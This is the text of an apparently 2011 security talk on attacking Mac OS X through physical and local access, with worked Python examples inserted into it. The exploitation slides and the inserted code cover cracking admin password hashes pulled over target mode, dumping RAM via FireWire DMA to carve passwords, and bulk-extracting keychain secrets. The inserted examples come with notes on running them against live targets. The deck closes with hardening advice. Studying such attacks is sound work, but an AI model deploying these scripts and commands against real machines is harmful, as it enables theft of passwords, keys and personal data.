Hck Mac OS X Tips and tricks for Mac OS X hack Summary

Introduction

Exploitation of target mode

Exploitation of physical memory

Exploitation of user privileges

Conclusion

Introduction

Market share

[Charts: market share, Mac vs Windows; market share by continent]

Mac OS X history

1996 : Purchase of NeXT and the NeXTSTEP OS by Apple
1996 : Return of Steve Jobs to Apple (he had left in 1985)
1999 : First version of Mac OS X Server (1.0)
2001 : First version of Mac OS X Workstation (10.0 Cheetah)
2006 : First Mac(Book) without a PowerPC processor, with an Intel processor

Mac OS X architecture

UNIX system based on the Darwin OS (hybrid kernel XNU)
The XNU kernel is based on the NeXTSTEP micro-kernel (Mach) and the BSD kernel (FreeBSD)
But Darwin doesn’t contain the graphical engine

Layered view (bottom to top), as drawn on the slide:

Hardware
Kernel space, Darwin (Mach): EFI, Platform Expert, Mach, BSD, I/O Kit
User space, OS X: Core services, Application services, Mac interfaces, Quartz/..., Login Window, .../Dock, Applications

Exploitation of target mode

About target mode

During startup, press “T”
Access is not protected by default
Full access to the disk’s file system

Alternatives

Single user mode (press “Apple + S”)
From a live OS on a USB/CD device > press “Alt”
From the Mac OS X installation DVD > press “C” and select “Reset Password” from the Utilities menu

Identify system users

User UIDs in /private/var/db/dslocal/indices/Default/index
User privileges (admin group membership) in /var/db/dslocal/nodes/Default/groups/admin.plist

Identify system passwords

Password hashes in /var/db/shadow/hash (up to 10.6: one file per user, named by the user’s GeneratedUID; Lion moves the hash into the user’s plist as ShadowHashData)
Find the clear-text password with a brute force attack (John the Ripper, JtR)
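Worked example, added here and not code from the slides: with the target-mode disk mounted read-only, the triage is to read admin.plist for the admin group members and to pull the salted SHA-1 field out of each /var/db/shadow/hash/<GeneratedUID> file and run a dictionary attack on it, which is what handing that field to JtR’s xsha format does. The plist and the hash file below are constructed sample data; the field layout (4-byte salt followed by SHA-1(salt || password) at columns 169-216) is the 10.5/10.6 layout, taken as given, and the file length is padding only.

```python
"""Offline triage of a Mac OS X 10.5/10.6 volume reached through target mode.

Added example, not the slides' own code. Assumed layout of that era:
  /var/db/dslocal/nodes/Default/groups/admin.plist  -> "users" = admin names
  /var/db/shadow/hash/<GeneratedUID>                 -> hex text; columns
      169-216 hold the salted SHA-1: 4-byte salt || SHA-1(salt || password)
Both inputs built below are constructed, not taken from a real system.
"""
import hashlib
import plistlib
from typing import Iterable, List, Optional, Tuple

SALTED_SHA1 = slice(168, 216)   # 0-based slice for the 1-based columns 169-216
HASH_FILE_LEN = 1240            # padding for the constructed file; only the field offset matters


def build_admin_plist(users: List[str], guids: List[str]) -> bytes:
    """Constructed admin.plist with the keys the real group record carries."""
    record = {"name": ["admin"], "gid": ["80"], "users": users, "groupmembers": guids}
    return plistlib.dumps(record)


def admin_users(admin_plist: bytes) -> List[str]:
    """Names in the admin group: those can sudo, so they matter most."""
    return list(plistlib.loads(admin_plist).get("users", []))


def salted_sha1(salt: bytes, password: str) -> str:
    return hashlib.sha1(salt + password.encode("utf-8")).hexdigest()


def build_hash_file(password: str, salt: bytes) -> str:
    """Constructed hash file: zero-filled except for the salted SHA-1 field."""
    assert len(salt) == 4
    body = ["0"] * HASH_FILE_LEN
    body[SALTED_SHA1] = list(salt.hex() + salted_sha1(salt, password))  # 8 + 40 hex chars
    return "".join(body)


def extract_salted_sha1(hash_file: str) -> Tuple[bytes, str]:
    """Return (salt, hex digest); raise if the field is absent (all zeros)."""
    field = hash_file[SALTED_SHA1]
    if len(field) != 48 or set(field) == {"0"}:
        raise ValueError("no salted SHA-1 field in this hash file")
    return bytes.fromhex(field[:8]), field[8:]


def crack(hash_file: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack, the same computation JtR runs for its xsha format."""
    salt, digest = extract_salted_sha1(hash_file)
    for candidate in wordlist:
        if salted_sha1(salt, candidate) == digest:
            return candidate
    return None


if __name__ == "__main__":
    plist = build_admin_plist(["root", "test"], ["FFFFEEEE-DD00-0000-0000-000000000000"])
    print("admin users:", admin_users(plist))
    sample = build_hash_file("letmein", bytes.fromhex("deadbeef"))
    print("cracked:", crack(sample, ["123456", "letmein", "password"]))
```

On a real volume, replace the constructed inputs with the files under the mount point (/Volumes/<disk>/var/db/...); the 48-character field alone, one per line, is also what `john --format=xsha` expects.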

About Keychain files

Keychain files store secret data like Safari passwords, WiFi keys, usernames/passwords, Google username/password (Contacts, Picasa), Exchange username/password, ...

Open Keychain files

For each user, the login keychain is stored in /Users/<user>/Library/Keychains/login.keychain
Keychain files are protected by the keychain password
It’s possible to import any keychain file with ...
But you have to know the “keychain” password to exploit it :(
By default, the “keychain” password is equal to the user’s system password :-)
You can identify the password in Volatility data
You can attempt to identify the password by brute force attack

About FileVault encryption

Encryption of the file system, like BitLocker or dm-crypt
Full disk encryption from the Lion version (FileVault 2)
Only home directory encryption for the previous versions
Native function since Mac OS X 10.3
“.dmg” images can use FileVault encryption

[Screenshots: home directory without encryption; home directory with FileVault encryption]

Open FileVault file

The legacy FileVault file is the user’s encrypted home image, /Users/<user>/<user>.sparsebundle (test.sparsebundle in the demo)
FileVault files are protected by a password ... and it’s the same as the system password :-)
So from target mode it’s easy to decrypt this file
You can identify the AES key in Volatility data ...
Else, without access to the password hashes, it is possible to attempt to find the password by brute force attack

Exploitation of physical memory

Physical memory dump

From root access, MacMemoryReader (MMR) can dump RAM
MMR loads a temporary kernel extension that exposes a /dev/mem device to read from
The “sleepimage” file (/private/var/vm/sleepimage) contains a physical memory dump for safe sleep (hibernation) mode
From full disk access, the “sleepimage” file can be read
From recent versions, the file is encrypted
Configuration of the “sleepimage” encryption (root privileges required to modify it)

Physical extraction (cold boot attack) ...
Tools to extract RAM > http://www.mcgrewsecurity.com

From DMA access, a RAM dump is possible and EASY
The “pythonraw1394” libraries allow to dump the RAM of a Windows system from Linux (2006 - Adam Boileau - Winlockpwn)
The “libforensic1394” libraries (Freddie Witherden) allow to dump the RAM of Mac OS X from OS X or Linux

DMA access - PoC

Using the “libforensic1394” libraries is very easy :-) and allows to write code to dump RAM ...

Exploit DMA access

DEMO
Demo video (exploit of FireWire DMA access) on http://sud0man.blogspot.fr

Identify secret data

Identify the current username for a locked session (opened without auto logon)
Identify the password for a locked session (opened without auto logon)
Identify the current username for a locked session (opened with auto logon)
Identify the current password for a locked session (opened with auto logon)
Identify just the username for a locked session after startup

A lot of other secret data is in physical memory, like:

Email / data
Office documents data
Web passwords
Software passwords
Keychain password
...
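Worked example, added here and not the slides’ or Inception’s code, serving both the libforensic1394 dump slides and the secret-identification slides above: a page-by-page physical read loop that survives unreadable ranges, followed by the carving that turns a dump into candidate credentials by listing the printable strings around a known anchor (the logged-in username). The forensic1394 binding names (Bus, enable_sbp2, devices, Device.open/read) are assumed from that library’s Python API and imported lazily; everything that runs here uses a constructed memory image and a fake reader.

```python
"""Dump physical memory page by page and carve strings around an anchor.

Added example, not the slides' code. The FireWire reader relies on the
libforensic1394 Python binding (module forensic1394: Bus, enable_sbp2,
devices, Device.open, Device.read); those names are an assumption about the
installed version, so the import is deferred and the offline run below uses
a constructed memory image and a fake reader instead of a real DMA channel.
"""
import re
import time
from typing import Callable, Iterator, List, Tuple

PAGE = 4096
Reader = Callable[[int, int], bytes]         # read(physical_address, size) -> bytes
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")  # ASCII runs of 4+ characters


def firewire_reader(settle_seconds: float = 2.0) -> Reader:
    """read() backed by the first FireWire target; assumed libforensic1394 API."""
    from forensic1394 import Bus                 # deferred on purpose
    bus = Bus()
    bus.enable_sbp2()            # pose as an SBP-2 device so the target enables DMA
    time.sleep(settle_seconds)   # the target needs a moment to configure the link
    device = bus.devices()[0]
    device.open()
    return device.read


def dump_range(read: Reader, start: int, end: int, page: int = PAGE) -> Iterator[Tuple[int, bytes]]:
    """Yield (address, bytes) per page. A failing read (device memory, the hole
    past the end of RAM) is zero-filled so the dump keeps its offsets."""
    addr = start
    while addr < end:
        size = min(page, end - addr)
        try:
            data = read(addr, size)
        except Exception:
            data = b"\x00" * size
        yield addr, data
        addr += size


def dump_to_bytes(read: Reader, start: int, end: int) -> bytes:
    return b"".join(data for _, data in dump_range(read, start, end))


def strings_near(image: bytes, anchor: bytes, window: int = 256) -> List[Tuple[int, List[bytes]]]:
    """For each occurrence of anchor (e.g. the session's username) return the
    printable strings within +/- window bytes: a password handled by the same
    process usually sits close by, which is what the PoCs above rely on."""
    hits = []
    pos = image.find(anchor)
    while pos != -1:
        lo = max(0, pos - window)
        hi = min(len(image), pos + len(anchor) + window)
        hits.append((pos, [m.group(0) for m in PRINTABLE.finditer(image[lo:hi])]))
        pos = image.find(anchor, pos + 1)
    return hits


def make_fake_image() -> bytes:
    """Constructed two-page image: page 0 empty, page 1 holds a username and a
    secret nearby; the fake reader faults on anything past the image."""
    page1 = bytearray(PAGE)
    page1[100:122] = b"loginwindow:user=alice"
    page1[200:216] = b"Pass=Winter2011!"
    return bytes(PAGE) + bytes(page1)


def fake_reader(image: bytes) -> Reader:
    def read(addr: int, size: int) -> bytes:
        if addr >= len(image):
            raise IOError("DMA read fault at %#x" % addr)
        return image[addr:addr + size]
    return read


if __name__ == "__main__":
    image = dump_to_bytes(fake_reader(make_fake_image()), 0, 3 * PAGE)
    for offset, found in strings_near(image, b"alice"):
        print(hex(offset), found)
```

Against a live target, swap `fake_reader(...)` for `firewire_reader()` and dump up to the machine’s RAM size; the anchor is whatever you already know about the session (the account name shown on the lock screen).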

The AES-128 key used for FileVault encryption can be found in physical memory and allows to:

Decrypt the encrypted data
Identify secret data on the hard disk (like system passwords)
Unlock the system

The AESKeyFind tool can extract AES keys
Passware Kit 11.3 can extract and exploit the found keys

[Screenshots: PoC to identify Web and software passwords; PoC to identify Mac OS X passwords]

Is it possible to extract secret data when full encryption is activated (Lion version) by DMA access? YES! but NO if:

The system is not started (pre-boot authentication screen)
The system is hibernated with power removed from RAM (hibernatemode=25)
Or the parameter to remove the FileVault keys from RAM is activated (destroyfvkeyonstandby=1)
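Worked example, added here and not from the slides: a check of the two pmset settings the slide names as the conditions under which a DMA or cold-boot read of a sleeping Mac yields no usable FileVault key. It parses the `pmset -g` listing; the sample output is constructed, and the lower-case key spellings are assumed to be what pmset prints (see pmset(1)).

```python
"""Check hibernatemode and destroyfvkeyonstandby from `pmset -g` output.

Added example, not from the slides. hibernatemode 25 means RAM is powered
off when the machine sleeps (contents go to the sleepimage), and
destroyfvkeyonstandby 1 wipes the FileVault key from RAM on standby. The
sample text is constructed; the key names are assumed from pmset(1).
"""
from typing import Dict, List

SAMPLE_PMSET_G = """Active Profiles:
Battery Power\t\t-1
AC Power\t\t-1*
Currently in use:
 standbydelay         4200
 standby              1
 hibernatefile        /var/vm/sleepimage
 hibernatemode        3
 destroyfvkeyonstandby 0
 sleep                10
"""


def parse_pmset(text: str) -> Dict[str, str]:
    """Return the key/value pairs listed under 'Currently in use:'."""
    settings: Dict[str, str] = {}
    in_use = False
    for line in text.splitlines():
        if line.startswith("Currently in use:"):
            in_use = True
            continue
        if in_use and line.startswith(" "):
            parts = line.split()
            if len(parts) >= 2:
                settings[parts[0]] = parts[1]
    return settings


def ram_safe_on_standby(settings: Dict[str, str]) -> bool:
    """The slide's rule: no usable key in RAM if either protection is on."""
    return settings.get("hibernatemode") == "25" or settings.get("destroyfvkeyonstandby") == "1"


def findings(settings: Dict[str, str]) -> List[str]:
    """Human-readable gaps; empty when both protections are in place."""
    out = []
    mode = settings.get("hibernatemode", "<unset>")
    destroy = settings.get("destroyfvkeyonstandby", "<unset>")
    if mode != "25":
        out.append("hibernatemode=%s: RAM stays powered while asleep" % mode)
    if destroy != "1":
        out.append("destroyfvkeyonstandby=%s: FileVault key survives standby" % destroy)
    return out


def remediation(settings: Dict[str, str]) -> str:
    """The root-only pmset command that closes whichever gaps remain."""
    args = []
    if settings.get("hibernatemode") != "25":
        args.append("hibernatemode 25")
    if settings.get("destroyfvkeyonstandby") != "1":
        args.append("destroyfvkeyonstandby 1")
    return "sudo pmset -a " + " ".join(args) if args else "nothing to change"


if __name__ == "__main__":
    current = parse_pmset(SAMPLE_PMSET_G)
    for line in findings(current):
        print(line)
    print(remediation(current))
```

The slide’s rule treats either setting as sufficient; in practice you want both, since hibernatemode 25 alone leaves the key in RAM until the machine actually sleeps, and destroyfvkeyonstandby alone still leaves everything else in powered RAM.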

Writing physical memory

... to bypass the session password with the “libforensic1394” libraries! but ... it doesn’t work :-(
The Inception tool (breaknenter.org) will include options to bypass the password screen, but they are not implemented yet
Actually, I am searching for the right signature for 10.6 and 10.7

And Thunderbolt?

Like a FireWire port with an adapter, and so it can be exploited :-)

Exploitation of user privileges

Obtain system user access

From physical access

Identify a trivial password
Exploit DMA access, single user mode, ...
Exploit the auto-logon session of the first configured user (administrator privileges, hence sudo to root, by default)

From remote access

Identify services and usernames from the mDNS service (UDP/5353) of Bonjour (or “Zeroconf”); from another Mac, `dns-sd -B _services._dns-sd._udp local.` lists them, as does nmap’s dns-service-discovery script
By common “server side” vulnerabilities like SMB, SSH, Web, ...
By “client side” vulnerabilities of Safari, iTunes, iChat, QuickTime, Skype, ...

[Chart: Top 13 vulnerabilities in 2010, by product: Adobe Flash Player, Adobe Reader and Acrobat, Shockwave Player, Google Chrome, Sun Java Development Kit, Microsoft Office, Internet Explorer, Mozilla Firefox, Opera, RealPlayer, iTunes, ...; legend: MS and Apple are affected / Just Apple is affected / Apple is not affected]

[Chart: Security updates for Apple products]

“exploit-db.com” stores a lot of remote exploits
Sample of remote exploits for Mac OS X
“exploit-db.com” stores 15 remote exploits for the Mac OS X platform from 2010 and 145 remote exploits for the Windows platform from 2011
Most of the vulnerabilities are due to third-party software
Like other OSes, “Metasploit” allows to easily execute code under the context of the user
Safari exploit > CVE-2011-3230

User privileges escalation

Previously, if you obtain root privileges
You can execute a lot of operations (cf. Exploitation of target mode)
but the password can be useful ...

Previously, if you obtain user privileges
You can attempt to extract secret data from data or system files (personal data, passwords stored in txt files, emails, ...)
You can attempt to identify vulnerabilities of the configuration or software
You can attempt to exploit native Mac OS X functions
...

Exploit Mac OS X vulnerabilities

Exploitation of vulnerabilities is more difficult with ASLR (introduced in the Leopard version, full ASLR from Lion)
“exploit-db.com” stores a lot of local root exploits
Sample of local root exploits for Mac OS X
44 local exploits for Mac OS X from 2003 and 220 for Windows from 2011
Most of the vulnerabilities are due to third-party software

Exploit native functions

Using and copying passwords stored in the Keychain requires the user password

Exploit Keychain access

But the “security” command allows to bypass the password prompt ... :-)
It’s my Evernote password
Sample of the “security dump-keychain -d” command
Other extracted passwords: Safari passwords, WiFi keys, Skype username/password, Google username/password (Contacts, Picasa), Exchange username/password, ...
One of these passwords is maybe the root password ...

Exploit Keychain

Exploitation is possible just with “login.keychain”
Exploitation is possible because “login.keychain” is automatically opened during the session ... only if the keychain password is identical to the user system password
Opening “system.keychain” requires login and password (root can also unlock it with the key stored in /var/db/SystemKey)
Caveat: what “security dump-keychain -d” bypasses is the keychain password prompt; each item’s ACL still raises an Allow/Deny dialog on the logged-in session unless the item already trusts the caller, so the dump needs an interactive session or a way to click through those dialogs
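Worked example, added here and not the slides’ code: the dump that “security dump-keychain -d” prints is a series of text blocks, and the useful part of a pentest is reducing it to who/where/what rows while skipping items that released no data. The sample dump below is constructed to follow the block layout security(1) prints (keychain: / class: / attributes: / data:); “acct”, “svce” and “srvr” are the real keychain attribute tags, the values are invented.

```python
"""Turn `security dump-keychain -d` output into (class, where, account, secret).

Added example, not the slides' code. The dump text is constructed to follow
the block layout security(1) prints; "acct", "svce" and "srvr" are the real
keychain attribute tags, the accounts and secrets are invented.
"""
import re
from typing import Dict, List, Optional, Tuple

SAMPLE_DUMP = '''keychain: "/Users/test/Library/Keychains/login.keychain"
version: 512
class: "genp"
attributes:
    0x00000007 <blob>="Evernote"
    "acct"<blob>="test@example.com"
    "svce"<blob>="Evernote"
data:
"Evern0te-Pa55"
keychain: "/Users/test/Library/Keychains/login.keychain"
version: 512
class: "inet"
attributes:
    0x00000007 <blob>="www.google.com"
    "acct"<blob>="test.user"
    "ptcl"<uint32>="htps"
    "srvr"<blob>="www.google.com"
data:
0x473030676c652d5061353500  "G00gle-Pa55\\000"
keychain: "/Users/test/Library/Keychains/login.keychain"
version: 512
class: "genp"
attributes:
    "acct"<blob>="AirPort"
    "svce"<blob>="HomeWiFi"
data:
<NULL>
'''

ATTR = re.compile(r'^\s*"(\w{4})"<\w+>="(.*)"$')   # "acct"<blob>="value"


def decode_data(value: str) -> Optional[str]:
    """Line after 'data:': <NULL> when nothing was released, a quoted string,
    or a hex dump followed by its printable rendering."""
    value = value.strip()
    if value == "<NULL>" or not value:
        return None
    if value.startswith("0x"):
        raw = bytes.fromhex(value.split()[0][2:])
        return raw.rstrip(b"\x00").decode("utf-8", "replace")
    return value.strip('"')


def parse_dump(text: str) -> List[Dict[str, Optional[str]]]:
    """One dict per keychain item: class, data and the four-letter attributes."""
    items: List[Dict[str, Optional[str]]] = []
    cur: Optional[Dict[str, Optional[str]]] = None
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i]
        if line.startswith("keychain:"):
            cur = {"keychain": line.split('"')[1]}
            items.append(cur)
        elif cur is not None and line.startswith("class:"):
            cur["class"] = line.split('"')[1]
        elif cur is not None and line.startswith("data:"):
            i += 1                        # the secret is on the following line
            cur["data"] = decode_data(lines[i]) if i < len(lines) else None
        elif cur is not None:
            m = ATTR.match(line)
            if m:
                cur[m.group(1)] = m.group(2)
        i += 1
    return items


def credentials(items: List[Dict[str, Optional[str]]]) -> List[Tuple[str, str, str, str]]:
    """(class, service or server, account, secret) for items that released data."""
    rows = []
    for it in items:
        secret = it.get("data")
        if not secret:
            continue                      # denied in the Allow/Deny dialog, or not a password item
        where = it.get("svce") or it.get("srvr") or "?"
        rows.append((it.get("class") or "?", where, it.get("acct") or "?", secret))
    return rows


if __name__ == "__main__":
    for row in credentials(parse_dump(SAMPLE_DUMP)):
        print(row)
```

Feed it a real dump with `security dump-keychain -d login.keychain > dump.txt` on the target session; the `<NULL>` rows are the items whose dialog was denied, which is also your measure of how noisy the collection was.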

Recent tips to escalate privileges

CVE-2011-3435/36: exploit the dscl command to dump password hashes or to reset a password without being root:

$ dscl localhost -read /Search/Users/<user>
$ dscl localhost -passwd /Search/Users/<user>

Exploit the “macports” configuration to get a remote root
http://blog.infobytesec.com/2011/07/pwning-mac-os-x-with-evilgrade-macports.html?m=1
Exploit an application outside of the sandbox to bypass the restrictions on an application within the sandbox
http://www.generation-nt.com/mac-lion-faille-sandbox-corelabs-actualite-1501811.html

Conclusion

Mac OS X secured or not?

A secured Mac OS X is as secure as Windows
http://www.securityvibes.fr/produits-technologies/osx-lion-securite/
More exploits for Windows than for Mac OS X because of market share (more users, so more research ...)

Physical access is not secured

By default, my son could own my MacBook
by single user mode, by target mode, by DMA access, ... as opposed to a Windows PC (only via DMA)
To limit that, it is necessary to install software to configure an EFI password, and it is not as easy as under a BIOS!
Password prompt during startup, but a modification of the hardware configuration allows to reset the password ...

Optimum protection

Use full disk encryption (FileVault, TrueCrypt, ...)
Encrypt the “sleepimage” file, force the removal of power from RAM (hibernatemode=25, destroyfvkeyonstandby=1)
Use a different password for system access and Keychain, or use authentication by certificate (http://www.opensc-project.org/sca/wiki/LogonAuthenticate)
Use strong passwords and change your passwords regularly
Configure the system to install security patches automatically
Configure the local firewall to block incoming connections
Install an antivirus (ClamXav, Avast, Intego, BitDefender, F-Secure, Panda Antivirus, ...)
Disable remote services (mDNS, SMB, Web, HTTP, ...)
And avoid publishing your system backups or keychain files on the Internet

no .... ???? Yes !!!
Google is your friend or not (for the victims)

Keychain files and Google!

Google Hacking DataBase (inurl:, intitle:, filetype:)
Very easy to identify keychain files like *.keychain

... and APT

iSEC Partners: http://www.isecpartners.com/storage/docs/presentations/iSEC_BH2011_Mac_APT.pdf

Questions?

Slides, paper and tools on:

http://sud0man.blogspot.com

sganama[at]gmail.com / @sud0man